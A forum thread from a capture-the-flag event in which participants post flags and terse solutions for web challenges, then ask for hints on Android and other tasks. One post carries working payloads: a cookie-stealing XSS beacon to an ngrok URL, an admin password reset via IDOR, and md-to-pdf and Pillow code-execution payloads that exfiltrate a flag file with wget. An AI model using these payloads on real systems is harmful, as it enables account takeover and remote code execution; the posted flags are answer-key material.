Return to forum

gfhxbhxffgdhxdhv · May 16, 2022 at 10:47 PM

I have "Misc > Matrioshka Brain" with a short write-up. DM me.

hellobox · May 16, 2022 at 11:28 PM

(May 16, 2022, 05:11 PM)HungryGull Wrote:
(May 16, 2022, 04:54 PM)si1 Wrote:
(May 16, 2022, 04:50 PM)HungryGull Wrote: Web - Kryptos Support
HTB{x55_4nd_id0rs_ar3_fun!!}

Web - BlinkerFluids
HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls}

Web - Amidst Us
HTB{i_slept_my_way_to_rce}

writeup plz

Kryptos Support
python3 -m http.server 80
ngrok http 80
Send:
<script>new Image().src="https:// YOUR_NGROK_URL /?" + document.cookie;</script>
Replace Cookie
Open /settings
Burp Suite:
POST /api/users/update HTTP/1.1
...
<SNIP>
...
{"password":"newpassword","uid":"1"}
Open /login
admin : newpassword

BlinkerFluids
https:// github.com/simonhaenisch/md-to-pdf/issues/99
Burp Suite:
POST /api/invoice/add HTTP/1.1
...
<SNIP>
...
{"markdown_content":"---js
((require('child_process')).execSync('cat ../flag.txt > static/test.txt'))
---RCE"}
Open /static/test.txt

Amidst Us
https:// cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
https:// github.com/advisories/GHSA-8vj2-vxx3-667w
python3 -m http.server 80
ngrok http 80
Use Burp Suite:
..."background":["exec('import os;os.system(\"TEMP=$(cat ../flag.txt);wget https:// YOUR_NGROK_URL /?result=${TEMP}\")')",255,255]...

Thank you

Can someone share hints for Mutation Lab cookie and Intergalactic Post , please

May 17, 2022 at 3:23 AM

Can anyone who solved the Android-in-the-Middle share the steps?

testing · May 17, 2022 at 9:42 AM

Any new hints or writeups?

mrjxsw · May 17, 2022 at 10:15 AM

Can anyone who solved the Android-in-the-Middle share the steps????

fa23fsed23 · May 17, 2022 at 11:59 AM

(May 17, 2022, 10:15 AM)mrjxsw Wrote: Can anyone who solved the Android-in-the-Middle share the steps????

google how to bypass ssl pinning

xemyll · May 17, 2022 at 2:03 PM

need help with Intergalactic Post

testing · May 17, 2022 at 2:20 PM

(May 17, 2022, 02:03 PM)xemyll Wrote: need help with Intergalactic Post

Same , can someone share a writeup , it sucks to get struck for hours and got no way

testing · May 17, 2022 at 2:42 PM

(May 17, 2022, 11:59 AM)fa23fsed23 Wrote:
(May 17, 2022, 10:15 AM)mrjxsw Wrote: Can anyone who solved the Android-in-the-Middle share the steps????

google how to bypass ssl pinning

How to capture the request? do we need Frida ?

fa23fsed23 · May 17, 2022 at 3:14 PM

(May 17, 2022, 02:42 PM)testing Wrote:
(May 17, 2022, 11:59 AM)fa23fsed23 Wrote:
(May 17, 2022, 10:15 AM)mrjxsw Wrote: Can anyone who solved the Android-in-the-Middle share the steps????

google how to bypass ssl pinning

How to capture the request? do we need Frida ?

frida, zap or burp all will work